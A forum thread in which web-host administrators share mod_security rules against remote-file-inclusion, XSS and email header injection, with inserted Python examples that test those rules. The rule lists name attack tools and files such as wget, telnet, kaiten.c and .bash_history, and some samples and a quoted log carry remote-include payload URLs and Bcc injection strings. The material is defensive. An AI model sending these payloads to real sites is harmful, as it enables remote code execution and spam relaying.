procam

Well-Known Member, joined Nov 24, 2003
Does anyone have anything to add to this that you feel is critically important for mod_security rules?

Code:
# WEB-ATTACKS wget command attempt
SecFilterSelective THE_REQUEST "wget "
# WEB-ATTACKS uname -a command attempt
SecFilterSelective THE_REQUEST "uname -a"
# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST "\.htgroup"
# WEB-ATTACKS .htaccess access
SecFilterSelective THE_REQUEST "\.htaccess"
# WEB-CLIENT Javascript URL host spoofing attempt
SecFilter "javascript\://"
# WEB-MISC cross site scripting (img src=javascript) attempt
SecFilter "img src=javascript"
# WEB-MISC cd..
SecFilterSelective THE_REQUEST "cd\.\."
# WEB-MISC ///cgi-bin access
SecFilterSelective THE_REQUEST "///cgi-bin"
# WEB-MISC /cgi-bin/// access
SecFilterSelective THE_REQUEST "/cgi-bin///"
# WEB-MISC /~root access
SecFilterSelective THE_REQUEST "/~root"
# WEB-MISC /~ftp access
SecFilterSelective THE_REQUEST "/~ftp"
# WEB-MISC htgrep attempt
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"
# WEB-MISC htgrep access
SecFilterSelective THE_REQUEST "/htgrep" log,pass
# WEB-MISC .history access
SecFilterSelective THE_REQUEST "/\.history"
# WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST "/\.bash_history"
# WEB-MISC /~nobody access
SecFilterSelective THE_REQUEST "/~nobody"
# WEB-PHP PHP-Wiki cross site scripting attempt
SecFilterSelective THE_REQUEST "<script"
# WEB-PHP strings overflow
SecFilterSelective THE_REQUEST "\?STRENGUR"
# WEB-PHP PHPLIB remote command attempt
SecFilter "_PHPLIB\[libdir\]"
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective THE_REQUEST "vi\.recover "
SecFilterSelective THE_REQUEST "netenberg "
SecFilterSelective THE_REQUEST "psybnc "
SecFilterSelective THE_REQUEST "fantastico_de_luxe "
SecFilterSelective THE_REQUEST "perl (xpl\.pl|kut|viewde|httpd\.txt)"
SecFilterSelective THE_REQUEST "\./xkernel\;"
SecFilterSelective THE_REQUEST "/kaiten\.c"
SecFilterSelective THE_REQUEST "/mampus\?&(cmd|command)"
 

procam

Well-Known Member, joined Nov 24, 2003
These two rules are really helpful:
Code:
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpe?g|png|sh|txt|bmp|js|html?|tmp|asp)\x20?\?"
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpe?g|png|sh|txt|bmp|js|html?|tmp|asp)\?"
They basically block out URIs which have a URL as a GET variable (eg. index.php?file=http://www.example.com/example.txt). This is very useful, as it blocks out most of the recent Mambo exploits.

Thank you~ :cool:
 

Daniel15

Well-Known Member, joined Oct 7, 2006, cPanel Access Level: Website Owner
These two rules are really helpful:
Code:
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpe?g|png|sh|txt|bmp|js|html?|tmp|asp)\x20?\?"
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpe?g|png|sh|txt|bmp|js|html?|tmp|asp)\?"
They basically block out URIs which have a URL as a GET variable (eg. index.php?file=http://www.example.com/example.txt). This is very useful, as it blocks out most of the recent Mambo exploits.

EDIT: Forgot to write this: I can't take credit for these rules, they are in HostMerit's modsec ruleset: http://hostmerit.com/modsec.user.conf
 

procam

Well-Known Member, joined Nov 24, 2003
Quoting Daniel15's post above (the two REQUEST_URI rules from HostMerit's modsec.user.conf):
These two rules disrupt the normal operation of tgp/mgp sites.
 

isputra

Well-Known Member, joined May 3, 2003
Hi,

I'm using http://hostmerit.com/modsec.user.conf as my rules, but my client can't use the WordPress theme editor.

The result is always:

"Error 406, Not Acceptable. An appropriate representation of the requested resource /wp-admin/theme-editor.php could not be found on this server."

And the log on the WHM Modsec link shows:

Access denied with code 406. Pattern match "<script" at POST_PAYLOAD

So I commented out the SecFilter "<script" like below:
# Weaker XSS protection but allows common HTML tags
#SecFilter "<script"

and theme-editor.php works again.

Is there any security issue if I comment out SecFilter "<script" like above?
 

isputra

Well-Known Member, joined May 3, 2003
Anyone?

Please give me a clue: must I add the rule back to my conf, or maybe replace it with another rule that doesn't break the WordPress theme-editor.php?
 

docbreed

Well-Known Member, joined Jul 18, 2005
I'm having no luck adding an allow rule. If someone could look this over and make suggestions, please.

url
Code:
http://www.domain.com/sm/admin/index.php?p=templates&Action=EditTemplate&TempID=2&Editing=1&SSID=xxvyipsq7igr7czxvo9k03
audit_log
Code:
==fd043b18==============================
Request: www.domain.com ip.ip.ip.ip - - [11/Jul/2007:16:05:59 -0500] "POST /sm/admin/index.php?p=templates&Action=EditTemplate&TempID=2&Save=Yes&SSID=xxvyipsq7igr7czxvo9k03 HTTP/1.1" 403 429 "http://www.domain.com/sm/admin/index.php?p=templates&Action=EditTemplate&TempID=2&Editing=1&SSID=xxvyipsq7igr7czxvo9k03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4" - "-"
----------------------------------------
POST /sm/admin/index.php?p=templates&Action=EditTemplate&TempID=2&Save=Yes&SSID=xxvyipsq7igr7czxvo9k03 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 980
Content-Type: multipart/form-data; boundary=---------------------------18977768221793
Host: www.domain.com
Keep-Alive: 300
Referer: http://www.domain.com/sm/admin/index.php?p=templates&Action=EditTemplate&TempID=2&Editing=1&SSID=xxvyipsq7igr7czxvo9k03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
mod_security-message: Access denied with code 403. Pattern match "file=http" at POST_PAYLOAD
mod_security-action: 403

980
-----------------------------18977768221793
Content-Disposition: form-data; name="Name"

test
-----------------------------18977768221793
Content-Disposition: form-data; name="Format"

2
-----------------------------18977768221793
Content-Disposition: form-data; name="TemplateID"

2
-----------------------------18977768221793
Content-Disposition: form-data; name="wysiwyg"

<html><head><title></title></head><body>test</body></html>
-----------------------------18977768221793
Content-Disposition: form-data; name="HTMLFile"

http://
-----------------------------18977768221793
Content-Disposition: form-data; name="HTMLContentFile"; filename=""
Content-Type: application/octet-stream


-----------------------------18977768221793
Content-Disposition: form-data; name="SubmitButton"

Save
-----------------------------18977768221793
Content-Disposition: form-data; name="RandomKey"

t4695377b6caf8
-----------------------------18977768221793--


HTTP/1.1 403 Forbidden
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
--fd043b18--
modsec.conf
Code:
<IfModule mod_security.c>
SecFilterEngine On
SecFilterCheckURLEncoding On
SecFilterForceByteRange 0 255
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log
SecFilterDebugLog logs/modsec_debug_log
SecFilterDebugLevel 0
SecFilterDefaultAction "deny,log,status:406"
SecFilterSelective REMOTE_ADDR "^127\.0\.0\.1$" nolog,allow
Include "/usr/local/apache/conf/modsec.user.conf"
</IfModule>
modsec.user.conf
http://www.hostmerit.com/modsec.user.conf
with the #SecFilter "file=http" uncommented.
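An added example, not code from the thread or from HostMerit's ruleset: a small Python model of what this audit log shows. Note that the raw multipart body above never contains the literal string file=http; the only place it can come from is the HTMLFile field with its http:// value. The model therefore assumes what I read mod_security 1.x as doing: it rebuilds the non-file parts of a multipart body as name=value pairs for POST_PAYLOAD (HTMLFile=http://) and matches patterns case-insensitively. The boundary and field values are taken from the log; the hostile request, the rule tuples, and the helper names are mine. The second half shows why an allow rule only helps when it sits before the deny rule in the file: rules are tried in order and the first match decides.

```python
import re

BOUNDARY = "---------------------------18977768221793"   # boundary from the audit log

# Form fields modelled on docbreed's audit log: (name, value, filename or None).
DOCBREED_PARTS = [
    ("Name", "test", None),
    ("Format", "2", None),
    ("TemplateID", "2", None),
    ("wysiwyg", "<html><head><title></title></head><body>test</body></html>", None),
    ("HTMLFile", "http://", None),                 # the field that trips "file=http"
    ("HTMLContentFile", "", ""),                   # empty file upload, as in the log
    ("SubmitButton", "Save", None),
    ("RandomKey", "t4695377b6caf8", None),
]


def multipart_body(boundary, parts):
    """Serialise parts as the multipart/form-data body Apache received."""
    out = []
    for name, value, filename in parts:
        out.append("--%s\r\n" % boundary)
        if filename is None:
            out.append('Content-Disposition: form-data; name="%s"\r\n\r\n%s\r\n' % (name, value))
        else:
            out.append('Content-Disposition: form-data; name="%s"; filename="%s"\r\n'
                       'Content-Type: application/octet-stream\r\n\r\n%s\r\n'
                       % (name, filename, value))
    out.append("--%s--\r\n" % boundary)
    return "".join(out)


def flatten_multipart(body, boundary):
    """Rebuild the body as name=value&name=value, skipping file parts. This is the
    POST_PAYLOAD view the filters run against (assumed 1.x behaviour; the exact
    encoding of values does not matter for the substring match below)."""
    fields = []
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if part in ("", "--"):
            continue
        head, _, value = part.partition("\r\n\r\n")
        m = re.search(r'name="([^"]*)"', head)
        if m and 'filename="' not in head:
            fields.append("%s=%s" % (m.group(1), value))
    return "&".join(fields)


def evaluate(request, rules):
    """mod_security 1.x semantics: rules in file order, first match decides.
    Case-insensitive matching is assumed; the logged hit needs it, since the
    only candidate substring in the payload is "HTMLFile=http://"."""
    for variable, pattern, action in rules:
        if re.search(pattern, request[variable], re.IGNORECASE):
            return action
    return "pass"       # nothing matched, the request goes through


ADMIN_URI = ("/sm/admin/index.php?p=templates&Action=EditTemplate&TempID=2"
             "&Save=Yes&SSID=xxvyipsq7igr7czxvo9k03")


def docbreed_request():
    body = multipart_body(BOUNDARY, DOCBREED_PARTS)
    return {"REQUEST_URI": ADMIN_URI, "POST_PAYLOAD": flatten_multipart(body, BOUNDARY)}


def hostile_request():
    # constructed remote-include attempt against an unrelated script
    return {"REQUEST_URI": "/index.php", "POST_PAYLOAD": "file=http://evil.example/r57.txt?"}


FILE_HTTP = ("POST_PAYLOAD", r"file=http", "deny")            # the HostMerit rule
ALLOW_ADMIN = ("REQUEST_URI", r"^/sm/admin/index\.php", "allow")  # hypothetical allow rule

DENY_ONLY = [FILE_HTTP]
ALLOW_FIRST = [ALLOW_ADMIN, FILE_HTTP]   # the order an allow rule needs
ALLOW_LAST = [FILE_HTTP, ALLOW_ADMIN]    # never reached for the admin POST

if __name__ == "__main__":
    print("raw body contains 'file=http':", "file=http" in multipart_body(BOUNDARY, DOCBREED_PARTS).lower())
    print("flattened POST_PAYLOAD:", docbreed_request()["POST_PAYLOAD"])
    for label, rules in (("deny only", DENY_ONLY), ("allow first", ALLOW_FIRST), ("allow last", ALLOW_LAST)):
        print("%-12s admin POST -> %s" % (label, evaluate(docbreed_request(), rules)))
    print("hostile POST with allow first ->", evaluate(hostile_request(), ALLOW_FIRST))
```

The caveat is that an allow on ^/sm/admin/index\.php switches off every filter for that script, so keep the allow as narrow as the application lets you; after that, the admin script's own login is all that stands between the rule set and an attacker who reaches that URL.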
 

Website Rob

Well-Known Member, joined Mar 23, 2002, cPanel Access Level: Root Administrator
Quoting isputra's post above (the WordPress theme-editor.php denial on SecFilter "<script"):
Using Pattern match "<script" would not be a good idea for a whole lot of reasons. ;)

Try this instead as it should help no matter what.

# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

# phpBB XSS Protection
SecFilterSelective REQUEST_URI "/posting\.php\?.*(<[[:space:]]*script|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/posting\.php\?mode=reply\&t=.*userid.*phpbb2mysql_t=(<[[:space:]]*script|(http|https|ftp)\:/)"
The last line is all one line.
 

jameshsi

Well-Known Member, joined Oct 22, 2001
Are there any rules for cgiemail?
I have hackers using my form, which uses cgiemail, to send spam all the time.
 

Website Rob

Well-Known Member, joined Mar 23, 2002, cPanel Access Level: Root Administrator
Personally, I always recommend that 'cgiemail' be disabled.

With that being said, here are some mod_sec Rules that might help with preventing Spammers from using Form pages (of any kind) to send their Spam.


####################################
# Email Injection Header fix
####################################
SecFilter "bcc:"
SecFilterSelective THE_REQUEST "bcc:|bcc%3A"
SecFilterSelective ARG_Bcc ".*\@"
SecFilterSelective ARGS_VALUES "\n\s*bcc\:.*\@"
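An added example, not from the thread: the four email-injection rules above mirrored in Python and run over constructed form submissions, next to the application bug they are compensating for (a form mailer that pastes field values straight into mail headers). The submissions, the rule labels and the helper names are mine; the example assumes the rules match case-insensitively.

```python
import re

# Constructed form submissions (already URL-decoded arguments), not real traffic.
SUBMISSIONS = {
    "legit": {"from": "alice@example.com", "subject": "Quote request",
              "message": "Hello, could you send me a quote?"},
    # classic header injection: a newline in the From field smuggles a Bcc header
    "lf_bcc": {"from": "alice@example.com\nbcc: v1@example.net, v2@example.net",
               "subject": "hi", "message": "x"},
    # same trick via the Subject field, with CRLF and upper case
    "crlf_bcc": {"from": "bob@example.com", "subject": "hi\r\nBCC: spam@example.net",
                 "message": "x"},
    # a form that exposes a Bcc field outright (what the ARG_Bcc rule targets)
    "bcc_field": {"from": "carol@example.com", "Bcc": "spam@example.net", "message": "x"},
    # ordinary prose that mentions "bcc:"; only the blunt SecFilter "bcc:" fires
    "mentions_bcc": {"from": "dave@example.com", "subject": "hi",
                     "message": "next time please put me on bcc: as well"},
}

# Python form of the ARGS_VALUES pattern; case-insensitive matching is assumed.
NEWLINE_BCC = re.compile(r"\n\s*bcc\:.*\@", re.IGNORECASE)


def header_injection_findings(args):
    """Which of the thread's rules would fire on one submission (set of labels)."""
    hits = set()
    for name, value in args.items():
        if "bcc:" in value.lower():          # SecFilter "bcc:" / THE_REQUEST "bcc:|bcc%3A"
            hits.add("SecFilter bcc:")
        if name == "Bcc" and "@" in value:   # SecFilterSelective ARG_Bcc ".*\@"
            hits.add("ARG_Bcc")
        if NEWLINE_BCC.search(value):        # SecFilterSelective ARGS_VALUES "\n\s*bcc\:.*\@"
            hits.add("ARGS_VALUES newline bcc")
    return hits


def build_headers_unsafe(args):
    """The bug the rules paper over: field values pasted into headers verbatim."""
    return "From: %s\r\nSubject: %s\r\n" % (args.get("from", ""), args.get("subject", ""))


def smuggled_headers(args):
    """Header names beyond From/Subject that an MTA would see after the unsafe build."""
    names = [line.split(":", 1)[0].strip().lower()
             for line in build_headers_unsafe(args).splitlines() if ":" in line]
    return [n for n in names if n not in ("from", "subject")]


def build_headers_safe(args):
    """The application-side fix: a header value may never contain CR or LF."""
    for field in ("from", "subject"):
        if re.search(r"[\r\n]", args.get(field, "")):
            raise ValueError("CR/LF in header field %r" % field)
    return build_headers_unsafe(args)


def safe_builder_rejects(args):
    """True if build_headers_safe refuses the submission."""
    try:
        build_headers_safe(args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for label, args in SUBMISSIONS.items():
        print("%-13s rules=%-45s smuggled=%s rejected=%s" % (
            label, sorted(header_injection_findings(args)),
            smuggled_headers(args), safe_builder_rejects(args)))
```

The newline rule is the one that actually identifies an injected header; SecFilter "bcc:" also fires on a message that merely mentions bcc:, and neither catches a Cc: or To: line injected the same way. The durable fix is in the form mailer, refusing any CR or LF in a header value, or not running cgiemail at all, as Rob recommends.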
 

fenixer

Well-Known Member, joined Feb 23, 2007
Quoting the two REQUEST_URI rules posted above (index.php?file=http://www.example.com/example.txt blocking):
I have seen these rules also at:
http://www.gotroot.com/downloads/ftp/modsecurity/rootkits.conf

The question is, they are already configured correctly (with so many others) in my modsec.user.conf, but they are useless... NOT APPLYING...

95% of the exploits uploaded and executed on my server come from Joomla / Mambo, with many components (com_*) that allow uploading files to 777 folders... Most of the spammer apps launched on my server, this 95% of exploits, come from URLs like:

index.php?file=http://www.example.com/example.txt

in other words, injecting external code to be executed by a local PHP script... in some other cases, downloading a file from an external URL into a local folder to execute later...

I have tried several ways to see if I could get the modsec 403 by requesting something like index.php?file=http://www.example.com/example.txt on my server, but it is always allowed... I guess the rules are not being applied...

Tried with www, with http, with different extensions... nothing, and as I said, 95% of the problems I am having come this way...

Can anyone see these rules running on their machines? Why, in my case, do I have several rules giving 403, but these two famous ones do not? Any idea? (modsec is driving me crazy!) :eek:
 

Infopro

Well-Known Member, joined May 20, 2003, cPanel Access Level: Root Administrator
Can anyone see these rules running on their machines?
Absolutely, daily.

Example from the past hour.

[Mon Jul 30 06:35:46 2007] [error] [client scumbag.ip.goes.here] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\\\x20?\\\\?" at REQUEST_URI [id "390144"][rev "1"] [msg "Rootkit attack: Generic Attempt to install rootkit"] [severity "CRITICAL"] [hostname "www.customerdomain.com"] [uri "/forum/vbgsitemap/vbgsitemap-config.php?base=http://scumbagsdomain.com/figo.txt?"]
Using rootkits.conf, useragents.conf, and several others.
 

fenixer

Well-Known Member, joined Feb 23, 2007
Thanks so much Infopro...

If you would be so kind, would you let me see your modsec.user.conf... maybe by publishing it here or sending me an email at [email protected]

Thanks... the problem is I cannot see this rule running for me at all, although my modsec is running (Apache 1.x) and other rules do work.

Any idea why these rules just cannot do the trick for my config?
 

Infopro

Well-Known Member, joined May 20, 2003, cPanel Access Level: Root Administrator
I think you'd do yourself some good to read up on all of this a bit more. By the time you get through a few of those you'll find your problem, I bet.
http://www.google.com/search?hl=en&q=cPanel+mod+security

What works for us may not be what will work for you on yours. As someone posted to a thread on these forums a while back, it's not exactly brain surgery. ;)

It sounds to me (just guessing) that you may have added the rulesets but forgot to 'enable' them by adding what makes them work inside your httpd.conf.

<IfModule mod_security.c>
#rulesets called from this location
</IfModule>

If you have that, what do you have inside it? I don't need to see the entire file, but in that area of your httpd.conf there are some things you do need to have for these rules to work at all. And of course, if they're remarked out, they are #bypassed.

Additionally, if you use chirpy's CSF you can check your mod_sec logs for activity and even edit the rulesets directly from WHM.

http://www.configserver.com/cp/csf.html

Hope that helps. ;)
 

fenixer

Well-Known Member, joined Feb 23, 2007
Sure, thanks Infopro for your answer...

It was not that... Modsec was running OK, as were all my configured rules...

I thought that rule was not running (only that one) because I tried to force it by requesting a URL and expecting a 403, but I was not receiving one...

Now I have had a look at some logs and can see it is applying correctly... it was simply the way I was trying to force the 403... certainly, I cannot force it the way I thought I should... nothing else...

I thought simply requesting http://www.domain.tld/index.php?site=http://www.xxxx.tld would get a 403 error, but no... but in my case I have seen some 403s due to this in audit_log, so I guess it is running OK in spite of that...

Sorry for wasting your time, and thanks so much for your effort...

:eek:
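The two REQUEST_URI rules quoted through this thread, run over constructed request URIs in Python. This is an added example, not code from the thread or from the HostMerit/gotroot rulesets; the URIs are made up except for the one taken from Infopro's error-log line. It shows what the patterns actually require: a parameter value of the form =http:/...<listed extension> followed by ? (optionally with a space first). That is why Infopro's logged hit fires while fenixer's test URL, and even the index.php?file=.../example.txt example quoted next to the rules, do not, and why a harmless link parameter that carries its own query string is blocked (the collateral damage procam saw on tgp/mgp sites). The patterns are the originals with the duplicated dat/txt alternatives dropped and jpg|jpeg folded into jpe?g, which matches exactly the same strings.

```python
import re

# The two REQUEST_URI patterns from the thread; Python's re accepts them as
# written (mod_security 1.x used PCRE). Order matters: first match wins.
EXT = r"(c|dat|kek|gif|jpe?g|png|sh|txt|bmp|js|html?|tmp|asp)"
RFI_RULES = [
    ("rootkit-space", re.compile(r"=(http|www|ftp)\:/(.+)\." + EXT + r"\x20?\?")),
    ("rootkit",       re.compile(r"=(http|www|ftp)\:/(.+)\." + EXT + r"\?")),
]


def matching_rule(request_uri):
    """Name of the first rule whose pattern is found in REQUEST_URI, or None."""
    for name, pattern in RFI_RULES:
        if pattern.search(request_uri):
            return name
    return None


# Constructed request URIs, annotated with the outcome the patterns give them.
SAMPLES = [
    # the hit from Infopro's error log: remote file with an extension and a trailing "?"
    ("/forum/vbgsitemap/vbgsitemap-config.php?base=http://scumbagsdomain.com/figo.txt?",
     "rootkit-space"),
    # a typical Mambo/Joomla include with "?" appended so the script's own suffix is ignored
    ("/index.php?mosConfig_absolute_path=http://evil.example/r57.txt?&cmd=id", "rootkit-space"),
    # the "x.gif ?" form that the \x20? variant was written for
    ("/index.php?file=http://evil.example/x.gif ?", "rootkit-space"),
    # the example quoted next to the rules: no trailing "?", so neither pattern fires
    ("/index.php?file=http://www.example.com/example.txt", None),
    # fenixer's manual test: no listed extension and no trailing "?"
    ("/index.php?site=http://www.xxxx.tld", None),
    # a harmless outbound link that happens to carry its own query string: blocked
    ("/out.php?url=http://www.example.com/gallery.html?page=2", "rootkit-space"),
]


def check_samples():
    """Samples whose outcome differs from the annotation (expected to be empty)."""
    return [(uri, want, matching_rule(uri)) for uri, want in SAMPLES
            if matching_rule(uri) != want]


if __name__ == "__main__":
    for uri, want in SAMPLES:
        print("%-14s %s" % (matching_rule(uri), uri))
    assert not check_samples()
```

Because \x20? makes the space optional, the first rule matches everything the second one does, so the second rule never fires in this order; it is dead weight in the rule file. The block prints each sample with the rule that caught it, so a request can be checked against the pattern before hunting through audit_log for a 403 that was never going to happen.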
 

jameshsi

Well-Known Member, joined Oct 22, 2001
Hi!
I have this rule:
Code:
# Weaker XSS protection but allows common HTML tags
SecFilter "<script"
If for some reason I want to disable this rule for one site, for example mydomain.com, how should I do it?

Because I want to submit a form, and in that form I need to fill in something like:

Code:
<script language="javascript" src="http://mydomain.com/plugins/jf/service/jf_create.php?code=bdbdc9bf9241b99d4c3abd0110aeea86"></script>
I am thinking either I disable the rule forbidding <script for only this site, or I create an allow rule for some pattern matching the URL I need to fill in the form to submit.

Any suggestion?